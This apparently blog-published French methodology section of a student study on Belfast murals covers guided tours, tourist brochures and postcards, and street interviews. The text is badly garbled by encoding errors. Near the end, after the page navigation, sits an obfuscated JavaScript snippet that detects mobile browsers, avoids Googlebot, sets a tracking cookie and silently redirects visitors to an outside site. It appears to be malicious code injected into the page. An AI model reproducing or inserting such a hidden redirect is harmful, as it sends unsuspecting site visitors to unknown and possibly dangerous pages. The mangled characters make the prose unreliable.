MA�thodologie

Les circuits touristiques

a�? Les circuits dans notre travail
Dans le cadre de notre travail, les circuits touristiques nous ont servi donnA�es essentielles. Puisque ces tours font partis des attractions les plus populaires A� Belfast, nous avons pu dA�finir un A�chantillon de murals recommandA� et prA�sentA� par les guides des agences touristiques. Il A�tait donc important, pour nous, de participer A� ces tours en tant que touristes car selon notre opinion, le fait da��amener des individus A� tel ou tel endroit, puis de leur indiquer tel ou tel mural, participe A� la crA�ation ainsi qua��A� la��entretien du cercle de reprA�sentations auquel nous nous intA�ressons.

a�? Double Decker Tour
Pour le premier circuit, nous avons fait un tour de la ville dans la��un des cA�lA?bres bus rouges A� deux A�tages de Hop On Hop Off. Ces bus effectuent un circuit A� travers les diffA�rents quartiers de la ville au cours duquel des explications sont donnA�es par une guide. La��option de descendre du bus A� diffA�rentes arrA?ts autour des principales attractions est proposA�e aux touristes, toutefois pour des questions da��organisation, nous ne la��avons pas fait. Lors du tour, dA?s que le bus ralentissait ou sa��arrA?tait pour qua��on puisse admirer un mural, nous en prenions compte. Ca��est donc principalement dans les quartiers de Shankill et Falls que notre intA�rA?t sa��est mobilisA�.

Liste des fresques observA�es lors du circuit A� bord du Hop On Hop Off.
Liste des fresques observA�es lors du circuit A� bord du Hop On Hop Off.

a�? Black Cab Tour
Le deuxiA?me type de circuit sa��est effectuA� en Black Cab. Ce sont les taxis noirs emblA�matiques de la Grande-Bretagne dont les chauffeurs, qui font aussi office de guide, ont A�tA� impliquA� dans le conflit. Les Black Cabs sa��inscrivent dans une continuitA� historique. En effet, ca��A�tait la��une des seules maniA?res de se rendre dans le quartier de Falls durant le conflit, aprA?s que les lignes de transports publiques aient A�tA� abandonnA�es.
Aujourda��hui, ce sont da��anciens prisonniers politiques rA�publicains qui, A� bord de ces taxis, prA�sentent le conflit en menant les touristes A� travers les quartiers de Falls et parfois de Shankill. En montrant les vestiges du conflit, principalement les murals, les Black Cabs sont une attraction privilA�giA�e pour tout touriste intA�ressA� par les Troubles. Ca��est pour cela qua��il nous a paru important de prendre en compte ce circuit.
Nous avons ainsi pu observer les pratiques touristiques principales autour des murals ; telle que les prendre en photo, y apposer sa signature, ou simplement les contempler. Nous avons divisA� notre groupe en deux afin da��avoir davantage de donnA�es car nous prA�supposions que les conducteurs de taxis na��effectuaient pas tous les mA?mes itinA�raires.

Liste des fresques observA�es lors des tours en Black Cab respectifs.
Liste des fresques observA�es lors des tours en Black Cab respectifs.

 

a�? Tour pA�destre dans East Belfast
MA?me si le trajet jusqua��A�A� East Belfast ne faisait pas partie des parcours touristiques officiels, le conducteur de bus, en nous y amenant, a attirA� notre attention sur quelques murals le long du trajet.
Nous avons donc visitA� East Belfast avec des guides loyalistes. La premiA?re partie de la visite sa��est dA�roulA�e dans un petit musA�e. Nous avons rapidement rA�alisA� que cette attraction A�tait moins organisA�e et professionnelle que les autres, mais elle na��en na��A�tait pas moins intA�ressante.
La deuxiA?me partie se prA�sentait sous la forme da��un tour pA�destre A� travers le quartier de East Belfast. Nous nous sommes promenA�s en suivant notre guide qui nous montrait diffA�rents endroits importants pour la cause loyaliste, en mettant la��accent sur les multiples murals qui se situent dans le quartier. Tout comme les guides des Black Cab Tours, nos nouveaux guides A�taient A�galement da��anciens volontaires, mais cette fois pour les organisations loyalistes. Ainsi donc, le tour A� travers East Belfast A�tait fortement biaisA� en faveur du cA?tA� protestant, tout comme les tours en Black Cabs A�taient biaisA�s en faveur du cA?tA� catholique.

Liste des fresques observA�es lors du tour dans East Belfast.
Liste des fresques observA�es lors du tour dans East Belfast.

 

a�? Observations gA�nA�rales
Nous constatons qua��une redondance de certains murals se prA�sente dans les donnA�es rA�coltA�es lors des diffA�rents circuits touristiques. En effet, le tour du Double Decker Bus et les parcours des Black Cab Tours ont insistA� sur les fresques de Bobby Sands et The Peace Wall, en indiquant le mural, voir mA?me en sa��arrA?tant sur place pour nous laisser le temps de bien le contempler.
Quant au tour pA�destre de East Belfast qui passe exclusivement dans ce quartier de la ville, le guide na��a fait aucune rA�fA�rence aux deux fresques en question.
Les diffA�rents guides na��hA�sitaient pas non plus A� nous encourager A� prendre des photos des deux murals ou, comme dans le cas du Peace Wall, signer nos noms sur a�?the biggest guestbook in Belfasta�? selon notre guide. Ca��est une pratique assez populaire et cela semble A?tre trA?s encouragA� par les agents touristiques.
Lors des multiples tours dans les diffA�rents quartiers de West Belfast, nous avons remarquA� da��autres groupes de touristes qui suivaient des guides. Beaucoup da��entre eux s’arrA?taient devant les murals et prenaient des photos. Nous avons observA� ce phA�nomA?ne A� plusieurs reprises, surtout devant le mural de Bobby Sands, le PeaceWall, le International Peace Wall ainsi que da��autres fresques comme le King of Orange ou celle de Stevie A� Top Gun A� McKeag.

Documentations touristiques et souvenirs

a�? Implication dans notre travail
Au fil de notre sA�jour aI� Belfast, nous avons rA�coltA� divers documents concernant la��offre touristique. Office du tourisme, boutiques, musA�es ; A� chaque opportunitA� donnA�e, nous avons collectionnA� des documents destinA�s aux touristes ayant trait aux muralsA� : brochures publicitaires, plans pour touristes, cartes postales, etc.
Notre but, A� travers la rA�colte de souvenirs et documents touristiques A�tait de nous faire une idA�e de la��image-type des murals envoyA�e aux touristes. En effet, les flyers et brochures cherchent aI� attirer la��A�il des visiteurs, et de leur vendre quelque chose : une attraction, un circuit, etc. Ces divers A�lA�ments marketing sont donc un outil pertinent pour dA�terminer la maniA?re dont les murals sont vendus aux touristes. Ce qui y est prA�sentA� est le A�pittoresqueA� : ce que les touristes doivent impA�rativement avoir vu et photographiA�.

A� Le touriste identifie un lieu […] comme pittoresque parce qua��il la��a dA�jA� vu et qua��il peut le comparer A� ce qua��il connaA�t dA�jA�, soit par son expA�rience, soit grA?ce aux images qui en existent A�1

On comprend donc que les divers documents liA�s au tourisme jouent un rA?le clef dans la��entretien da��un cercle da��image, puisqua��ils informent des fresques A� voir. Ainsi le visiteur, une fois sur place, se rendra compte de a�?la��importancea�? du mural devant lequel il se trouve. De part ce dA�jA�-vu, la��A�lA�ment reprA�sentA�, dans notre cas, un mural, lui apparaA�tra comme A�tant pittoresque2, ca��est aI� dire a�?digne da��A?tre vua�? et da��A?tre photographiA�.
La rA�colte des documents nous semblait, en amont des recherches, A?tre un travail titanesque. Mais nous avons trA?s vite A�tA� forcA� de constater que peu de magasins ne vendent des souvenirs et des cartes postales en lien avec les murals. Il en va de mA?me pour les tour-opA�rateurs : seule une poignA�e da��entre eux promeut les murals dans la publicitA� pour leur circuit.

PrA�sentation des types de documents

Les documents que nous avons rA�coltA� se dA�clinent en trois catA�gories:
a�? Flyers, brochures et plans
a�? Cartes Postales
a�? Souvenirs

Dans les trois cas, nous nous sommes concentrA�s sur les documents reprA�sentant des fresques ou des parties de fresques.
Nous avons rA�coltA� au total une vingtaine de brochures rA�pondant A� ces critA?res, ainsi que quelques cartes trouvA�es principalement dans les offices touristiques du centre-ville, les prA�sentoirs de notre auberge, mais aussi au Centre gaA�lique CultA?rlann McAdam OI? Fiaich.
Au niveau des plans distribuA�s gratuitement aux touristes, nous na��en avons trouvA�s aucun qui ne soit pas inondA� de publicitA�. Bien que le cadrage diffA?re lA�gA?rement de la��un A� la��autre, il reste toujours focalisA� sur le centre-ville, avec le quartier du Titanic mis en A�vidence. Les murals ne sont jamais prA�cisA�ment indiquA�s sur les cartes, bien que leurs directions approximatives soit parfois mentionnA�es. Selon le cadrage du plan, les quartiers de Shankill et Falls na��apparaissent mA?me pas. Quant A� East Belfast, il na��est reprA�sentA� qua��une seule fois sur la��ensemble de notre A�chantillon cartographique.
Au fil de nos journA�es A� Belfast, nous avons donc traquA� puis achetA� les cartes postales comportant des photographies de murals. Nous avons toutefois A�tA� forcA� de constater que le choix A�tait restreint. En une semaine, il nous a A�tA� possible de rA�colter six cartes da��intA�rA?t plus ou moins important pour notre recherche dans des lieux divers. Si nous avons trouvA� la premiA?re dans un supermarchA� alimentaire et deux autres dans un bureau de poste, les trois restantes ont A�tA� achetA�es dans deux magasins de souvenirs diffA�rents.

 

Ca��est dans la��optique da��objets tA�moins da��une visite, que nous avons dA�cidA� de nous pencher sur les souvenirs vendus aux touristes visitant la capitale Nord-Irlandaise. Tout comme les cartes postales, nous avons eu beaucoup de peine A� en trouver. Les premiers souvenirs, petites figurines en plA?tre, sur lesquelles figuraient des photographies de murals ont A�tA� trouvA�s dans une petite boutique indA�pendante. Le reste des quelques objets observA�s a A�tA� trouvA� dans le magasin da��une grande chaA�ne de souvenirs irlandais. Ca��est A�galement dans cette boutique que certaines des cartes postales prA�cA�demment prA�sentA�es ont A�tA� trouvA�es.

a�? Observations gA�nA�rales
Da��une maniA?re gA�nA�rale, nous avons A�tA� A�tonnA� de la difficultA� A� trouver des documents traitant des murals destinA�s aux touristes. Si nous avons eu moins de peine A� trouver des brochures vendant des circuits touristiques autour des Troubles, les souvenirs, eux, semblent A?tre quasi-inexistants.
Sur les cartes postales et les souvenirs, tout comme sur les diffeI?rentes brochures et plans, la��accent est mis sur le Titanic ou sur la sA�rie tA�lA�visA�e Games of Thrones.
Lorsque des fresques sont reprA�sentA�es, on constate frA�quemment celle de Bobby Sands ou encore le International Peace Wall. Souvent, notamment sur les souvenirs et les cartes postales, les murals reprA�sentA�s na��existent plus, ou ont A�tA� repeints.

Micro-Trottoirs

a�? RA?le dans notre recherche
Afin de nuancer nos donnA�es se basant principalement sur l’observation de la��offre touristique, nous avons souhaitA� nous confronter A� la vision touristique des locaux sur les murals, vestiges visibles du conflit. Au centre de notre interrogation se trouvait la question : les locaux nous suggA?rent-ils de voir les mA?mes fresques que celles misent en avant par les divers agents touristiques ?
Nous estimons que de tels conseils participent A� la��entretien du cercle da��image.

a�? PrA�sentation de la mA�thode
Nous faisant passer pour des touristes, nous avons demandA� A� des passants quelles A�taient les fresques a�?A� voira�? dans les environs. Pour rester cohA�rent avec la situation, nous avons questionnA� les locaux principalement dans les quartiers les plus susceptibles da��A?tre visitA�s par des touristes intA�ressA�s A� voir des murals, ca��est-A�-dire Falls et Shankill, ainsi qua��au centre ville.
Si ce dernier endroit nous a intA�ressA�s, ca��est de par son aspect a�?neutrea�? face au conflit mais aussi par le fait que la��on na��y trouve aucun mural partisan. Au vu de cette absence, nous A�tions intriguA�s par les rA�ponses que nous obtiendrions lors de nos entretiens spontanA�s ; ca��est-aI�-dire vers quels quartiers et quelles fresques on nous enverrait.
Nous sommes donc allA�s questionner les passants des quartiers de Falls et Shankill, la��un A�tant majoritairement unioniste et la��autre loyaliste.

a�? Retour rA�flexif sur la mA�thode
Si dans un premier temps, cette approche nonchalante et informelle des habitants de Belfast nous a semblA� une bonne idA�e, notamment par le fait de se faire passer pour des visiteurs et ainsi, da��A�viter da��A�ventuels biais qua��aurait instaurA�e la mention da��une recherche dans le cadre acadA�mique, nous avons rapidement A�tA� rattrapA�s par des questionnements da��ordre A�thique.
Nous rassurant derriA?re des semis-vA�ritA�s, nous nous prA�sentions aux locaux comme A�tant en visite quelques jours dans la rA�gion et voulant voir des murals. En soit, ceci na��A�tait pas faux. Nous avons toutefois A�tA� piA�gA� par quelqua��un voulant engager une conversation et demandant ce que nous avions dA�jA� vu depuis notre arrivA�e. Si notre interlocutrice ne la��a probablement pas ressenti, un malaise sa��est installA� entre nous trois, ne sachant pas comment rA�pondre A� cette dame que chaque jour depuis notre arrivA�e en Irlande-du-Nord avait A�tA� consacrA� aux fresques mA?me que celle-ci venait de nous indiquer.
Un autre conflit moral sa��est installA� en nous aprA?s avoir demandA� A� des passants de nous conseiller des fresques, nous ne nous dirigions pas dans la direction indiquA�e. Ce qui nous importait dans le fond, A�tait la rA�ponse donnA�e par les locaux, et non les fresques en elles-mA?mes.
Autre point discutable : A� aucun moment nous na��avons mentionnA� A� nos interlocuteurs que les donnA�es rA�coltA�es serviraient A� la��A�laboration da��un travail acadA�mique qui apparaA�trait en ligne. Bien que la��identification des personnes soit impossible et que nous-mA?me ignorons leur identitA�, cela soulA?ve des questions A�thiques et morales.

a�? RA�sultats
Dans la��ensemble, ce petit A�chantillon peu structurA� da��entretiens ne nous permet pas da��avancer de rA�sultats prA�cis. Toutefois, il est utile pour complA�ter ou nuancer les donnA�es acquises par divers canaux. De plus, il nous a permis une meilleure connaissance du terrain. Voici toutefois les grandes lignes aI� tirer de nos micro-trottoirs :

PremiA?rement, les rA�ponses donnA�es par les locaux nous ont semblA�es dans une premier temps trA?s mA�caniques. Ca��est souvent aprA?s de brA?ves rA�flexions que des A�lA�ments moins automatiques nous ont A�tA� donnA�s.
En effet, si quelqua��un vous aborde dans votre ville et vous demande quelles sont les attractions principales A� ne pas louper, vous rA�pondrez instinctivement les haut-lieux touristiques, avant de donner des conseils plus personnalisA�s et prA�cis.

Ensuite, les trois quartiers de micro-trottoires ne donnent pas les mA?mes rA�sultats. Au centre ville, la plupart des personnes interrogA�es na��ont trA?s souvent pas su nous rA�pondre, nous encourageant a faire un tour en Black Cab. Da��autres nous conseillaient la��International Peace Wall. La diffA�rence majeure entre nos interlocuteurs A� Falls et A� Shankill est que dans la partie rA�publicaine, on nous envoyait trA�s souvent vers le mural de Bobby Sands et la��International Peace Wall. Alors que dans la partie loyaliste, les rA�ponses A�taient plus diverses. Certains nous envoyaient vers les murals les plus proches, da��autres nous mentionnaient la��International Peace Wall ou/et le mural de Bobby Sands, da��autres encore nous conseillaient de nous enfoncer dans de petites ruelles.

Dans les trois quartiers, nous avons trA?s souvent A�tA� envoyA� au International Peace Wall. Celui-ci faisait parti des rA�ponses automatiques : sans hA�sitation, les locaux nous la��ont le plus conseillA�.

De maniA?re gA�nA�rale, nous avons observA�s une certaine rA�ticence A� aborder le sujet, tant dans les quartiers de Shankill et de Falls que au centre ville.
Nous na��avons malheureusement pas eu le temps de mener plus da��entretiens durant notre sA�jour. Toutefois, entre les deux sA�ries de micro-trottoirs que nous avons effectuA�es, on constate une diffA�rence notoire: la mA�tA�o. En effet, nous observons de grandes diffA�rences entre les entretiens du premier jour, pluvieux, et du second jour, ensoleillA�. Celles-ci se manifestent notamment par la durA�e des A�changes ainsi que la disposition de nos interlocuteurs aI� nous parler.

Observations complA?tes

Afin d’avoir une vue d’ensemble de nos observations, cliquez sur le tableau des rA�sultats des observations. Celui-ci recense l’ensemble de nos observations. Y est reprA�sentA� le nombre de fois ainsi que le contexte dans lequel une fresque prA�cises nous A� A�tA� indiquA�e.


1- Gauthier, L., Staszak, J.-F., ClichA� exotiques, Paris, Editions de Monza, 2015, p.59
2- Ibidem



a�? PROBLA�MATISATION

a�? MA�THODOLOGIE

a�? PARTIE THA�MATIQUE
a�? CONCLUSION
A�

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.